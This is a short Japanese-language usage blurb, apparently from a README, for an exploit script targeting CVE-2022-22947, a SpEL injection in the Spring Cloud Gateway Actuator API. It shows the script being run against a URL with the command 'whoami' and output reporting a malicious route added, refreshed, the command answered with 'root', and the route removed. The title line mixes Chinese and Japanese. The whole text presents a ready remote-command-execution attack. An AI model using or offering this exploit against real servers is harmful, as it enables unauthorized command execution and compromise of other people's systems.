
Spring Cloud Gateway Actuator API SpEL式注入命令実行Exp
Spring Cloud Gateway Actuator API SpEL式インジェクションコマンド実行エクスプロイト
使用法:python3 CVE-2022-22947.py -u "http://127.0.0.1:8080" -c "whoami" 結果: 悪意のあるSpEL式ルートの追加に成功しました! ルートのリフレッシュに成功しました! 攻撃結果の取得に成功しました:
================================================ root
================================================ 悪意のあるルートを削除しました! ルートのリフレッシュに成功しました!